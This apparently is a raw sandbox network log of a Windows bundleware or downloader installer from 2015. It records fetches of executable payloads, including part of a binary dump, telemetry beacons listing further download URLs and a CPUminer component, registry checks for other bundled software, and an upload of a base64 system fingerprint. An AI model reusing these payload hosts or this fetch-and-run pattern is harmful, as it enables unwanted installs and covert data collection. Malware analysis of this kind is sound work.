GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 0mLafLqiFoE7lAnjOckFkBiq3oFHOUGuU/UPAdPviX08ujUZ0Q/PLFfUVmFGLYRe..x-amz-request-id: 7E7AA2A235A254B9..Date: Sun, 06 Sep 2015 22:59:13 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_DCOUNT1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:59:09 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Sun, 06 Sep 15 22:59:00 GMT
Set-Cookie: _c4aid=0E4EAB8E159440C295ABAE9174EC5050; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=0E4EAB8E159440C295ABAE9174EC5050,1441580349.56868; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 134153);......0..
GET /data.gif?app=12345&ibic=c34de9db4800cc5c07ea55982373e9fd&verifier=394e163cb9e37b27c10848a9a1e45ae5&ver=107&os=XP32&browser=ci&campaign=003266&browserver=107&country=UA&event=4&rnd=2444 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:59:12 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1441580352.dop006.am4.t,1441580352.cds063.am4.c
GIF89a.............,...........D..;..
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 459
Connection: Keep-Alive
Cache-Control: no-cache
cnt=c4cd2a1e9d435f16d360805b8034cae5&_srvlog=NSI &browser=ie&capp=nsdummy&cid=12216¤t_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=C8318CA6891F5119A9FD96EC19E98D71&sysid1=C8318CA6891F5119A9FD96EC19E98D71&te=1441580333&ts=1441580332&ver=1.1.2.41&c[CPUminer][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[CPUminer][pi]=0&c[CPUminer][e]=0&c[CPUminer][ts]=0&c[CPUminer][te]=0&cmdl=C:DOCUME~1admLOCALS~1Tempsh37.tmp /ci 12216&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Sun, 06 Sep 2015 22:58:52 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ..HTTP/1.1 200 OK..Content-Type: text/plain; charset=UTF-8..Date: Sun, 06 Sep 2015 22:58:52 GMT..Server: Apache/2.2.15 (Red Hat)..X-Powered-By: PHP/5.3.3..Content-Length: 14..Connection: keep-alive...... ....
GET /smt.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d10huri5h4o4a3.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 211114
Connection: keep-alive
Date: Sat, 29 Aug 2015 04:33:07 GMT
Last-Modified: Wed, 25 Feb 2015 18:08:27 GMT
ETag: "20f288aa7d995a4bfcb240b66383ebf4"
Accept-Ranges: bytes
Server: AmazonS3
Age: 63186
X-Cache: Hit from cloudfront
Via: 1.1 a1f7dccda76e63b2a1a4c1c034019a4b.cloudfront.net (CloudFront)
X-Amz-Cf-Id: tbV4Yt9mde8YGHNk_aW0Hd8EvnIoo-IG8Fz4BXyLs9x45Ciidw_FSw==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t....... ...f...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...0...............................rsrc....f... ...h...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=134153&tag=RE_CLICKMEIN_INSTALL_FIN HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 06 Sep 2015 22:59:09 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Sun, 06 Sep 15 22:59:00 GMT
Set-Cookie: _c4aid=F1D48DACDE97474BBB5711B2490125BD; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=F1D48DACDE97474BBB5711B2490125BD,1441580349.03597; expires=Fri, 04 Mar 16 22:59:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 134153);......0..
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4958\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:35 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4959\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:36 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4960\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:36 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"4961\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:36 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}..
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:36 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:37 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:37 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 177
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:38 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:38 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 190
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:38 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:38 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 181
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:38 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:38 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 194
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:39 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:39 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 183
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:40 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:40 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 196
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:41 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:41 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:42 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:42 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d16hr9n7t75k58.cloudfront.net/36e0f22eacad857de2cd3b76aedc24a7.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:42 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:42 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 189
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:43 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:43 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:43 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:43 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&errorlevel=0&v=2\"}"}POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d16hr9n7t75k58.cloudfront.net/df4a6a3ed77e60d6758afca091ca0c1f.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:58:50 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:58:50 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&errorlevel=0&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:59:09 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:59:09 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 170
Connection: Keep-Alive
Cache-Control: no-cache
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Sun, 06 Sep 2015 22:59:10 GMT
X-Powered-By: Express
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Sun, 06 Sep 2015 22:59:10 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..
GET /OperaRUnew/Bundle_OperaRUnew.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
<<< skipped >>>
GET /binsis/get_pre_offering_checks?uid=78E613EC0FD24B388D7E6C851DDC4F6F&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNzAgMTMgYjYgYzEgMWMgYmQtYjAgMjkgOWEgMWYgNzggZmQgNTUgYTMgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d3oxtn1x3b8d7i.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Server: nginx
Date: Sun, 06 Sep 2015 22:59:13 GMT
Expires: Sun, 06 Sep 2015 20:12:33 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 1fcd1033bfe42d3b0b03eb4bfbf9624a.cloudfront.net (CloudFront)
X-Amz-Cf-Id: kAb47qG1qlzOZrd7ZUULdXky7NgLIl-5xySEeejeq7h_pnyCDJKM0A==
37a0..<?xml version="1.0"?>.<pre_offering_checks><check type="registry" return_name="check_4" return_value_type="boolean"><value_to_check><key>HKCU\Software\Somoto\SDP</key><name>uid</name></value_to_check></check><check type="registry" return_name="check_586" return_value_type="boolean"><value_to_check><key>HKCU\Software\WebPlayer</key><name>AppsHat</name></value_to_check></check><check type="registry" return_name="check_1842" return_value_type="boolean"><value_to_check><key>HKCU\Software\WebPlayer\AppsHat</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2182" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\Goobzo\YouTube Accelerator</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2246" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\YTDownloader</key><name>version</name></value_to_check></check><check type="registry" return_name="check_2450" return_value_type="boolean"><value_to_check><key>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\HotspotShield</key><name>DisplayName</name></value_to_check></check><check type="registry" return_name="check_3850" return_value_type="boolean"><val
<<< skipped >>>
POST /binsis/xml?uid=78E613EC0FD24B388D7E6C851DDC4F6F&v=2.2.2&v1=U2VyaWFsTnVtYmVyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWZXJzaW9uICAgICAgICAgICANDQpWTXdhcmUtNTYgNGQgNzAgMTMgYjYgYzEgMWMgYmQtYjAgMjkgOWEgMWYgNzggZmQgNTUgYTMgIElOVEVMICAtIDYwNDAwMDA&affid=vuupcntmb&sid=vuupculwo&s=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Filename: nsn47.tmp
User-Agent: NSIS_Inetc (Mozilla)
Host: d3oxtn1x3b8d7i.cloudfront.net
Content-Length: 8480
Connection: Keep-Alive
Cache-Control: no-cache
